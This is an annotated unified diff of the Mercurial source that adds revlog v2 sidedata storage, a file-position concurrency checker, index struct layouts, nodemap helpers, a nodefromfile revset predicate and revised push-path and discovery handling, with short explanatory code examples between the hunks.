+ ifh, self.indexfile, offset + curr * self.index.entry_size
+ )
+ else:
+ # Entries in the .i are a consistent size.
+ self._concurrencychecker(
+ ifh, self.indexfile, curr * self.index.entry_size
+ )
+ self._concurrencychecker(dfh, self.datafile, offset)
+
p1r, p2r = self.rev(p1), self.rev(p2)
# full versions are inserted when the needed deltas
@@ -2309,6 +2358,16 @@
deltainfo = deltacomputer.finddeltainfo(revinfo, fh)
+ if sidedata:
+ serialized_sidedata = sidedatautil.serialize_sidedata(sidedata)
+ sidedata_offset = offset + deltainfo.deltalen
+ else:
+ serialized_sidedata = b""
+ # Don't store an offset when the sidedata is empty; that way empty
+ # sidedata is easy to detect and indistinguishable from entries we
+ # add by hand.
+ sidedata_offset = 0
+
e = (
offset_type(offset, flags),
deltainfo.deltalen,
@@ -2318,12 +2377,24 @@
p1r,
p2r,
node,
+ sidedata_offset,
+ len(serialized_sidedata),
)
+
+ if self.version & 0xFFFF != REVLOGV2:
+ e = e[:8]
+
self.index.append(e)
-
entry = self._io.packentry(e, self.node, self.version, curr)
self._writeentry(
- transaction, ifh, dfh, entry, deltainfo.data, link, offset
+ transaction,
+ ifh,
+ dfh,
+ entry,
+ deltainfo.data,
+ link,
+ offset,
+ serialized_sidedata,
)
rawtext = btext[0]
@@ -2334,9 +2405,31 @@
if type(rawtext) == bytes: # only accept immutable objects
self._revisioncache = (node, curr, rawtext)
self._chainbasecache[curr] = deltainfo.chainbase
- return node
-
- def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset):
+ return curr
+
+ def _get_data_offset(self, prev):
+ """Returns the current offset in the (in-transaction) data file.
+ Versions < 2 of the revlog can get this in O(1); revlog v2 needs a docket
+ file to store that information: since sidedata can be rewritten to the
+ end of the data file within a transaction, you can have cases where, for
+ example, rev `n` does not have sidedata while rev `n - 1` does, leading
+ to `n - 1`'s sidedata being written after `n`'s data.
+
+ TODO cache this in a docket file before getting out of experimental."""
+ if self.version & 0xFFFF != REVLOGV2:
+ return self.end(prev)
+
+ offset = 0
+ for rev, entry in enumerate(self.index):
+ sidedata_end = entry[8] + entry[9]
+ # Sidedata for a previous rev has potentially been written after
+ # this rev's end, so take the max.
+ offset = max(self.end(rev), offset, sidedata_end)
+ return offset
+
+ def _writeentry(
+ self, transaction, ifh, dfh, entry, data, link, offset, sidedata
+ ):
# Files opened in a+ mode have inconsistent behavior on various
# platforms. Windows requires that a file positioning call be made
# when the file handle transitions between reads and writes. See
@@ -2360,13 +2453,17 @@
if data[0]:
dfh.write(data[0])
dfh.write(data[1])
+ if sidedata:
+ dfh.write(sidedata)
ifh.write(entry)
else:
- offset += curr * self._io.size
+ offset += curr * self.index.entry_size
transaction.add(self.indexfile, offset)
ifh.write(entry)
ifh.write(data[0])
ifh.write(data[1])
+ if sidedata:
+ ifh.write(sidedata)
self._enforceinlinesize(transaction, ifh)
nodemaputil.setup_persistent_nodemap(transaction, self)
@@ -2375,6 +2472,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
):
@@ -2397,7 +2495,7 @@
if r:
end = self.end(r - 1)
ifh = self._indexfp(b"a+")
- isize = r * self._io.size
+ isize = r * self.index.entry_size
if self._inline:
transaction.add(self.indexfile, end + isize)
dfh = None
@@ -2418,15 +2516,16 @@
deltacomputer = deltautil.deltacomputer(self)
# loop through our set of deltas
for data in deltas:
- node, p1, p2, linknode, deltabase, delta, flags = data
+ node, p1, p2, linknode, deltabase, delta, flags, sidedata = data
link = linkmapper(linknode)
flags = flags or REVIDX_DEFAULT_FLAGS
- if self.index.has_node(node):
+ rev = self.index.get_rev(node)
+ if rev is not None:
# this can happen if two branches make the same change
- self._nodeduplicatecallback(transaction, node)
+ self._nodeduplicatecallback(transaction, rev)
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, rev)
empty = False
continue
@@ -2464,7 +2563,7 @@
# We're only using addgroup() in the context of changegroup
# generation so the revision data can always be handled as raw
# by the flagprocessor.
- self._addrevision(
+ rev = self._addrevision(
node,
None,
transaction,
@@ -2475,12 +2574,13 @@
(baserev, delta),
ifh,
dfh,
- alwayscache=bool(addrevisioncb),
+ alwayscache=alwayscache,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
if not dfh and not self._inline:
@@ -2551,9 +2651,9 @@
end = self.start(rev)
if not self._inline:
transaction.add(self.datafile, end)
- end = rev * self._io.size
+ end = rev * self.index.entry_size
else:
- end += rev * self._io.size
+ end += rev * self.index.entry_size
transaction.add(self.indexfile, end)
@@ -2592,7 +2692,7 @@
f.seek(0, io.SEEK_END)
actual = f.tell()
f.close()
- s = self._io.size
+ s = self.index.entry_size
i = max(0, actual // s)
di = actual - (i * s)
if self._inline:
@@ -2621,6 +2721,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
if nodesorder not in (b'nodes', b'storage', b'linear', None):
raise error.ProgrammingError(
@@ -2649,6 +2750,7 @@
deltamode=deltamode,
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
+ sidedata_helpers=sidedata_helpers,
)
DELTAREUSEALWAYS = b'always'
@@ -3087,3 +3189,54 @@
)
return d
+
+ def rewrite_sidedata(self, helpers, startrev, endrev):
+ if self.version & 0xFFFF != REVLOGV2:
+ return
+ # inline revlogs are not yet supported because they suffer from an
+ # issue when being rewritten (it's not an append-only operation).
+ # See issue6485.
+ assert not self._inline
+ if not helpers[1] and not helpers[2]:
+ # Nothing to generate or remove
+ return
+
+ new_entries = []
+ # append the new sidedata
+ with self._datafp(b'a+') as fp:
+ # Maybe this bug still exists, see revlog._writeentry
+ fp.seek(0, os.SEEK_END)
+ current_offset = fp.tell()
+ for rev in range(startrev, endrev + 1):
+ entry = self.index[rev]
+ new_sidedata = storageutil.run_sidedata_helpers(
+ store=self,
+ sidedata_helpers=helpers,
+ sidedata={},
+ rev=rev,
+ )
+
+ serialized_sidedata = sidedatautil.serialize_sidedata(
+ new_sidedata
+ )
+ if entry[8] != 0 or entry[9] != 0:
+ # rewriting entries that already have sidedata is not
+ # supported yet, because it introduces garbage data in the
+ # revlog.
+ msg = b"Rewriting existing sidedata is not supported yet"
+ raise error.Abort(msg)
+ entry = entry[:8]
+ entry += (current_offset, len(serialized_sidedata))
+
+ fp.write(serialized_sidedata)
+ new_entries.append(entry)
+ current_offset += len(serialized_sidedata)
+
+ # rewrite the new index entries
+ with self._indexfp(b'w+') as fp:
+ fp.seek(startrev * self.index.entry_size)
+ for i, entry in enumerate(new_entries):
+ rev = startrev + i
+ self.index.replace_sidedata_info(rev, entry[8], entry[9])
+ packed = self._io.packentry(entry, self.node, self.version, rev)
+ fp.write(packed)
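
In a v2 index tuple, positions 8 and 9 carry the sidedata offset and length,
which is why `_get_data_offset` must scan for the true end of the data file
rather than trusting `self.end(prev)`. A toy model of that max-scan over
hand-built entries:

    # Toy model of revlog._get_data_offset() for v2: the data file ends
    # at whichever is further, a revision's data or a sidedata blob
    # appended later in the transaction.
    # Each entry here is (end_of_data, sidedata_offset, sidedata_length).
    def get_data_offset(entries):
        offset = 0
        for end, sd_offset, sd_length in entries:
            offset = max(offset, end, sd_offset + sd_length)
        return offset

    entries = [
        (100, 0, 0),     # rev 0, no sidedata
        (180, 200, 30),  # rev 1, sidedata written past rev 2's data
        (200, 0, 0),     # rev 2
    ]
    assert get_data_offset(entries) == 230
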
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/revlogutils/concurrency_checker.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,38 @@
+from ..i18n import _
+from .. import error
+
+
+def get_checker(ui, revlog_name=b'changelog'):
+ """Get a function that checks file handle position is as expected.
+
+ This is used to ensure that files haven't been modified outside of our
+ knowledge (such as on a networked filesystem, if `hg debuglocks` was used,
+ or if writes to .hg happened that ignored the locks).
+
+ Due to revlogs supporting a concept of buffered, delayed, or diverted
+ writes, we're allowing the files to be shorter than expected (the data may
+ not have been written yet), but they can't be longer.
+
+ Please note that this check is not perfect; it can't detect all cases (there
+ may be false-negatives/false-OKs), but it should never claim there's an
+ issue when there isn't (false-positives/false-failures).
+ """
+
+ vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name)
+ # Avoid any `fh.tell` cost if this isn't enabled.
+ if not vpos or vpos not in [b'log', b'warn', b'fail']:
+ return None
+
+ def _checker(fh, fn, expected):
+ if fh.tell() <= expected:
+ return
+
+ msg = _(b'%s: file cursor at position %d, expected %d')
+ # Always log if we're going to warn or fail.
+ ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected)
+ if vpos == b'warn':
+ ui.warn((msg + b'\n') % (fn, fh.tell(), expected))
+ elif vpos == b'fail':
+ raise error.RevlogError(msg % (fn, fh.tell(), expected))
+
+ return _checker
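
The returned closure only complains when the handle sits further along than
the caller expects; shorter positions are tolerated because buffered or
delayed writes may not have landed yet. A quick way to see the contract, with
`io.BytesIO` standing in for a revlog file handle:

    import io

    def make_checker(mode='fail'):
        # simplified stand-in for get_checker(): allow shorter-than-
        # expected positions, complain about longer ones
        def _checker(fh, fn, expected):
            if fh.tell() <= expected:
                return
            msg = '%s: file cursor at position %d, expected %d' % (
                fn, fh.tell(), expected)
            if mode == 'fail':
                raise RuntimeError(msg)
            print('warning:', msg)
        return _checker

    fh = io.BytesIO(b'x' * 64)
    fh.seek(64)
    check = make_checker()
    check(fh, 'test.i', 64)      # fine: exactly where we expect
    try:
        check(fh, 'test.i', 32)  # cursor is past the expectation
    except RuntimeError as exc:
        print(exc)
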
--- a/mercurial/revlogutils/constants.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/constants.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlogdeltas.py - constant used for revlog logic
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2018 Octobus <contact@octobus.net>
#
# This software may be used and distributed according to the terms of the
@@ -9,14 +9,21 @@
from __future__ import absolute_import
+import struct
+
from ..interfaces import repository
-# revlog header flags
+### main revlog header
+
+INDEX_HEADER = struct.Struct(b">I")
+
+## revlog version
REVLOGV0 = 0
REVLOGV1 = 1
# Dummy value until file format is finalized.
-# Reminder: change the bounds check in revlog.__init__ when this is changed.
REVLOGV2 = 0xDEAD
+
+## global revlog header flags
# Shared across v1 and v2.
FLAG_INLINE_DATA = 1 << 16
# Only used by v1, implied by v2.
@@ -27,6 +34,46 @@
REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA
REVLOGV2_FLAGS = FLAG_INLINE_DATA
+### individual entry
+
+## index v0:
+# 4 bytes: offset
+# 4 bytes: compressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 20 bytes: parent 1 nodeid
+# 20 bytes: parent 2 nodeid
+# 20 bytes: nodeid
+INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s")
+
+## index v1
+# 6 bytes: offset
+# 2 bytes: flags
+# 4 bytes: compressed length
+# 4 bytes: uncompressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 4 bytes: parent 1 rev
+# 4 bytes: parent 2 rev
+# 32 bytes: nodeid
+INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x")
+assert INDEX_ENTRY_V1.size == 32 * 2
+
+## index v2
+# 6 bytes: offset
+# 2 bytes: flags
+# 4 bytes: compressed length
+# 4 bytes: uncompressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 4 bytes: parent 1 rev
+# 4 bytes: parent 2 rev
+# 32 bytes: nodeid
+# 8 bytes: sidedata offset
+# 4 bytes: sidedata compressed length
+# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page)
+INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x")
+assert INDEX_ENTRY_V2.size == 32 * 3
+
# revlog index flags
# For historical reasons, revlog's internal flags were exposed via the
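
As a quick sanity sketch (not part of the patch), the entry layouts above
can be exercised directly with the struct module; note that the first
quadword packs the 6-byte offset and the 2-byte flags together:

    import struct

    INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x")
    INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x")
    assert INDEX_ENTRY_V1.size == 32 * 2
    assert INDEX_ENTRY_V2.size == 32 * 3

    offset_flags = (1234 << 16) | 0  # offset 1234, no flags
    entry = INDEX_ENTRY_V2.pack(
        offset_flags, 10, 12, 0, 0, -1, -1, b"\x00" * 20, 0, 0
    )
    assert len(entry) == 96
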
--- a/mercurial/revlogutils/deltas.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/deltas.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlogdeltas.py - Logic around delta computation for revlog
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2018 Octobus <contact@octobus.net>
#
# This software may be used and distributed according to the terms of the
--- a/mercurial/revlogutils/flagutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/flagutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -84,7 +84,7 @@
flagprocessors[flag] = processor
-def processflagswrite(revlog, text, flags, sidedata):
+def processflagswrite(revlog, text, flags):
"""Inspect revision data flags and applies write transformations defined
by registered flag processors.
@@ -100,9 +100,12 @@
processed text and ``validatehash`` is a bool indicating whether the
returned text should be checked for hash integrity.
"""
- return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[
- :2
- ]
+ return _processflagsfunc(
+ revlog,
+ text,
+ flags,
+ b'write',
+ )[:2]
def processflagsread(revlog, text, flags):
@@ -145,14 +148,14 @@
return _processflagsfunc(revlog, text, flags, b'raw')[1]
-def _processflagsfunc(revlog, text, flags, operation, sidedata=None):
+def _processflagsfunc(revlog, text, flags, operation):
"""internal function to process flag on a revlog
This function is private to this module; code should never need to call it
directly."""
# fast path: no flag processors will run
if flags == 0:
- return text, True, {}
+ return text, True
if operation not in (b'read', b'write', b'raw'):
raise error.ProgrammingError(_(b"invalid '%s' operation") % operation)
# Check all flags are known.
@@ -168,7 +171,6 @@
if operation == b'write':
orderedflags = reversed(orderedflags)
- outsidedata = {}
for flag in orderedflags:
# If a flagprocessor has been registered for a known flag, apply the
# related operation transform and update result tuple.
@@ -186,10 +188,9 @@
if operation == b'raw':
vhash = rawtransform(revlog, text)
elif operation == b'read':
- text, vhash, s = readtransform(revlog, text)
- outsidedata.update(s)
+ text, vhash = readtransform(revlog, text)
else: # write operation
- text, vhash = writetransform(revlog, text, sidedata)
+ text, vhash = writetransform(revlog, text)
validatehash = validatehash and vhash
- return text, validatehash, outsidedata
+ return text, validatehash
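
A hedged sketch of what a flag processor looks like after this change (the
read and write transforms return 2-tuples again, with no sidedata channel;
SOME_FLAG is a hypothetical flag constant):

    def _noop_read(revlog, text):
        return text, True  # (possibly rewritten text, validatehash)

    def _noop_write(revlog, text):
        return text, True

    def _noop_raw(revlog, text):
        return True  # the rawtext hash remains valid

    # registration goes through the existing table:
    # flagutil.addflagprocessor(SOME_FLAG, (_noop_read, _noop_write, _noop_raw))
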
--- a/mercurial/revlogutils/nodemap.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/nodemap.py Tue Apr 20 11:01:06 2021 -0400
@@ -53,7 +53,11 @@
try:
with revlog.opener(filename) as fd:
if use_mmap:
- data = util.buffer(util.mmapread(fd, data_length))
+ try:
+ data = util.buffer(util.mmapread(fd, data_length))
+ except ValueError:
+ # raised when the file is smaller than the requested data_length
+ data = b''
else:
data = fd.read(data_length)
except (IOError, OSError) as e:
@@ -81,9 +85,9 @@
if tr.hasfinalize(callback_id):
return # no need to register again
tr.addpending(
- callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True)
+ callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True)
)
- tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog))
+ tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog))
class _NoTransaction(object):
@@ -123,20 +127,33 @@
return # we do not use persistent_nodemap on this revlog
notr = _NoTransaction()
- _persist_nodemap(notr, revlog)
+ persist_nodemap(notr, revlog)
for k in sorted(notr._postclose):
notr._postclose[k](None)
-def _persist_nodemap(tr, revlog, pending=False):
+def delete_nodemap(tr, repo, revlog):
+ """ Delete nodemap data on disk for a given revlog"""
+ if revlog.nodemap_file is None:
+ msg = "calling persist nodemap on a revlog without the feature enabled"
+ raise error.ProgrammingError(msg)
+ repo.svfs.unlink(revlog.nodemap_file)
+
+
+def persist_nodemap(tr, revlog, pending=False, force=False):
"""Write nodemap data on disk for a given revlog"""
if getattr(revlog, 'filteredrevs', ()):
raise error.ProgrammingError(
"cannot persist nodemap of a filtered changelog"
)
if revlog.nodemap_file is None:
- msg = "calling persist nodemap on a revlog without the feature enableb"
- raise error.ProgrammingError(msg)
+ if force:
+ revlog.nodemap_file = get_nodemap_file(
+ revlog.opener, revlog.indexfile
+ )
+ else:
+ msg = "calling persist nodemap on a revlog without the feature enabled"
+ raise error.ProgrammingError(msg)
can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental")
ondisk_docket = revlog._nodemap_docket
@@ -634,3 +651,14 @@
if isinstance(entry, dict):
return _find_node(entry, node[1:])
return entry
+
+
+def get_nodemap_file(opener, indexfile):
+ if indexfile.endswith(b'.a'):
+ pending_path = indexfile[:-4] + b".n.a"
+ if opener.exists(pending_path):
+ return pending_path
+ else:
+ return indexfile[:-4] + b".n"
+ else:
+ return indexfile[:-2] + b".n"
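
For illustration (not part of the patch), the naming scheme implemented by
get_nodemap_file() maps index files to their nodemap docket as follows:

    00changelog.i    ->  00changelog.n
    00changelog.i.a  ->  00changelog.n.a  (while a pending docket exists,
                                           otherwise 00changelog.n)
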
--- a/mercurial/revlogutils/sidedata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/sidedata.py Tue Apr 20 11:01:06 2021 -0400
@@ -13,9 +13,8 @@
The current implementation is experimental and subject to changes. Do not rely
on it in production.
-Sidedata are stored in the revlog itself, within the revision rawtext. They
-are inserted and removed from it using the flagprocessors mechanism. The following
-format is currently used::
+Sidedata are stored in the revlog itself, thanks to a new version of the
+revlog. The following format is currently used::
initial header:
<number of sidedata; 2 bytes>
@@ -60,48 +59,35 @@
SIDEDATA_ENTRY = struct.Struct('>HL20s')
-def sidedatawriteprocessor(rl, text, sidedata):
+def serialize_sidedata(sidedata):
sidedata = list(sidedata.items())
sidedata.sort()
- rawtext = [SIDEDATA_HEADER.pack(len(sidedata))]
+ buf = [SIDEDATA_HEADER.pack(len(sidedata))]
for key, value in sidedata:
digest = hashutil.sha1(value).digest()
- rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest))
+ buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest))
for key, value in sidedata:
- rawtext.append(value)
- rawtext.append(bytes(text))
- return b''.join(rawtext), False
+ buf.append(value)
+ buf = b''.join(buf)
+ return buf
-def sidedatareadprocessor(rl, text):
+def deserialize_sidedata(blob):
sidedata = {}
offset = 0
- (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size])
+ (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size])
offset += SIDEDATA_HEADER.size
dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry)
for i in range(nbentry):
nextoffset = offset + SIDEDATA_ENTRY.size
- key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset])
+ key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset])
offset = nextoffset
# read the data associated with that entry
nextdataoffset = dataoffset + size
- entrytext = text[dataoffset:nextdataoffset]
+ entrytext = bytes(blob[dataoffset:nextdataoffset])
readdigest = hashutil.sha1(entrytext).digest()
if storeddigest != readdigest:
raise error.SidedataHashError(key, storeddigest, readdigest)
sidedata[key] = entrytext
dataoffset = nextdataoffset
- text = text[dataoffset:]
- return text, True, sidedata
-
-
-def sidedatarawprocessor(rl, text):
- # side data modifies rawtext and prevent rawtext hash validation
- return False
-
-
-processors = (
- sidedatareadprocessor,
- sidedatawriteprocessor,
- sidedatarawprocessor,
-)
+ return sidedata
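
A round-trip sketch for the two helpers above (illustrative; keys are the
16-bit integers packed by SIDEDATA_ENTRY, values are bytes):

    from mercurial.revlogutils import sidedata as sidedatamod

    data = {1: b'some-value', 2: b'other-value'}
    blob = sidedatamod.serialize_sidedata(data)
    assert sidedatamod.deserialize_sidedata(blob) == data
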
--- a/mercurial/revset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revset.py - revision set queries for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -41,6 +41,7 @@
from .utils import (
dateutil,
stringutil,
+ urlutil,
)
# helpers for processing parsed tree
@@ -1335,6 +1336,29 @@
return subset & rs
+@predicate(b'nodefromfile(path)')
+def nodefromfile(repo, subset, x):
+ """
+ Select the changesets whose node ids are listed, one per line, in the
+ file at the given path. Node ids that do not resolve in the repository
+ are silently ignored.
+ """
+ path = getstring(x, _(b"nodefromfile requires a file path"))
+ listed_rev = set()
+ try:
+ with pycompat.open(path, 'rb') as f:
+ for line in f:
+ n = line.strip()
+ rn = _node(repo, n)
+ if rn is not None:
+ listed_rev.add(rn)
+ except IOError as exc:
+ m = _(b'cannot open nodes file "%s": %s')
+ m %= (path, encoding.strtolocal(exc.strerror))
+ raise error.Abort(m)
+ return subset & baseset(listed_rev)
+
+
@predicate(b'all()', safe=True)
def getall(repo, subset, x):
"""All changesets, the same as ``0:tip``."""
@@ -1697,13 +1721,9 @@
return subset & names
-@predicate(b'id(string)', safe=True)
-def node_(repo, subset, x):
- """Revision non-ambiguously specified by the given hex string prefix."""
- # i18n: "id" is a keyword
- l = getargs(x, 1, 1, _(b"id requires one argument"))
- # i18n: "id" is a keyword
- n = getstring(l[0], _(b"id requires a string"))
+def _node(repo, n):
+ """process a node input"""
+ rn = None
if len(n) == 40:
try:
rn = repo.changelog.rev(bin(n))
@@ -1712,7 +1732,6 @@
except (LookupError, TypeError):
rn = None
else:
- rn = None
try:
pm = scmutil.resolvehexnodeidprefix(repo, n)
if pm is not None:
@@ -1721,6 +1740,17 @@
pass
except error.WdirUnsupported:
rn = wdirrev
+ return rn
+
+
+@predicate(b'id(string)', safe=True)
+def node_(repo, subset, x):
+ """Revision non-ambiguously specified by the given hex string prefix."""
+ # i18n: "id" is a keyword
+ l = getargs(x, 1, 1, _(b"id requires one argument"))
+ # i18n: "id" is a keyword
+ n = getstring(l[0], _(b"id requires a string"))
+ rn = _node(repo, n)
if rn is None:
return baseset()
@@ -1825,27 +1855,28 @@
dest = (
l and getstring(l[0], _(b"outgoing requires a repository path")) or b''
)
- if not dest:
- # ui.paths.getpath() explicitly tests for None, not just a boolean
- dest = None
- path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = path.branch, []
-
- revs, checkout = hg.addbranchrevs(repo, repo, branches, [])
- if revs:
- revs = [repo.lookup(rev) for rev in revs]
- other = hg.peer(repo, {}, dest)
- repo.ui.pushbuffer()
- outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs)
- repo.ui.popbuffer()
+ if dest:
+ dests = [dest]
+ else:
+ dests = []
+ missing = set()
+ for path in urlutil.get_push_paths(repo, repo.ui, dests):
+ dest = path.pushloc or path.loc
+ branches = path.branch, []
+
+ revs, checkout = hg.addbranchrevs(repo, repo, branches, [])
+ if revs:
+ revs = [repo.lookup(rev) for rev in revs]
+ other = hg.peer(repo, {}, dest)
+ try:
+ repo.ui.pushbuffer()
+ outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs)
+ repo.ui.popbuffer()
+ finally:
+ other.close()
+ missing.update(outgoing.missing)
cl = repo.changelog
- o = {cl.rev(r) for r in outgoing.missing}
+ o = {cl.rev(r) for r in missing}
return subset & o
@@ -2089,8 +2120,11 @@
if len(l) > 1:
# i18n: "remote" is a keyword
dest = getstring(l[1], _(b"remote requires a repository path"))
- dest = repo.ui.expandpath(dest or b'default')
- dest, branches = hg.parseurl(dest)
+ if not dest:
+ dest = b'default'
+ dest, branches = urlutil.get_unique_pull_path(
+ b'remote', repo, repo.ui, dest
+ )
other = hg.peer(repo, {}, dest)
n = other.lookup(q)
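
A possible invocation of the new predicate (illustrative; the file contains
one hex node id per line, full or abbreviated, since _node() also resolves
prefixes):

    $ hg log -r 'nodefromfile("nodes.txt")'
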
--- a/mercurial/revsetlang.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revsetlang.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revsetlang.py - parser, tokenizer and utility for revision set language
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/scmutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/scmutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# scmutil.py - Mercurial core utility functions
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -181,17 +181,6 @@
encoding.strtolocal(inst.strerror),
)
)
- except error.OutOfBandError as inst:
- detailed_exit_code = 100
- if inst.args:
- msg = _(b"abort: remote error:\n")
- else:
- msg = _(b"abort: remote error\n")
- ui.error(msg)
- if inst.args:
- ui.error(b''.join(inst.args))
- if inst.hint:
- ui.error(b'(%s)\n' % inst.hint)
except error.RepoError as inst:
ui.error(_(b"abort: %s\n") % inst)
if inst.hint:
@@ -201,7 +190,9 @@
msg = inst.args[1]
if isinstance(msg, type(u'')):
msg = pycompat.sysbytes(msg)
- if not isinstance(msg, bytes):
+ if msg is None:
+ ui.error(b"\n")
+ elif not isinstance(msg, bytes):
ui.error(b" %r\n" % (msg,))
elif not msg:
ui.error(_(b" empty string\n"))
@@ -229,6 +220,10 @@
detailed_exit_code = 20
elif isinstance(inst, error.ConfigError):
detailed_exit_code = 30
+ elif isinstance(inst, error.HookAbort):
+ detailed_exit_code = 40
+ elif isinstance(inst, error.RemoteError):
+ detailed_exit_code = 100
elif isinstance(inst, error.SecurityError):
detailed_exit_code = 150
elif isinstance(inst, error.CanceledError):
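
Summarizing only what this hunk shows, the detailed exit codes assigned
here are: ConfigError -> 30, HookAbort -> 40, RemoteError -> 100 (subsuming
the removed OutOfBandError branch), and SecurityError -> 150. These refined
codes only surface when detailed exit codes are enabled; otherwise the
generic exit code is used.
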
--- a/mercurial/server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# server.py - utility and factory of server
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -22,7 +22,10 @@
util,
)
-from .utils import procutil
+from .utils import (
+ procutil,
+ urlutil,
+)
def runservice(
@@ -184,7 +187,7 @@
def _createhgwebservice(ui, repo, opts):
# this way we can check if something was given in the command-line
if opts.get(b'port'):
- opts[b'port'] = util.getport(opts.get(b'port'))
+ opts[b'port'] = urlutil.getport(opts.get(b'port'))
alluis = {ui}
if repo:
--- a/mercurial/setdiscovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/setdiscovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -286,8 +286,6 @@
ui,
local,
remote,
- initialsamplesize=100,
- fullsamplesize=200,
abortwhenunrelated=True,
ancestorsof=None,
audit=None,
@@ -315,7 +313,8 @@
ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads')
-
+ initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial')
+ fullsamplesize = ui.configint(b'devel', b'discovery.sample-size')
# We also ask remote about all the local heads. That set can be arbitrarily
# large, so we used to limit its size to `initialsamplesize`. We no longer
# do so, as it proved counterproductive. The skipped heads could lead to a
@@ -391,7 +390,7 @@
if audit is not None:
audit[b'total-roundtrips'] = 1
- if cl.tip() == nullid:
+ if cl.tiprev() == nullrev:
if srvheadhashes != [nullid]:
return [nullid], True, srvheadhashes
return [nullid], False, []
@@ -430,9 +429,12 @@
# full blown discovery
# if the server has a limit to its arguments size, we can't grow the sample.
- hard_limit_sample = remote.limitedarguments
- grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample')
- hard_limit_sample = hard_limit_sample and grow_sample
+ configbool = local.ui.configbool
+ grow_sample = configbool(b'devel', b'discovery.grow-sample')
+ grow_sample = grow_sample and not remote.limitedarguments
+
+ dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic')
+ hard_limit_sample = not (dynamic_sample or remote.limitedarguments)
randomize = ui.configbool(b'devel', b'discovery.randomize')
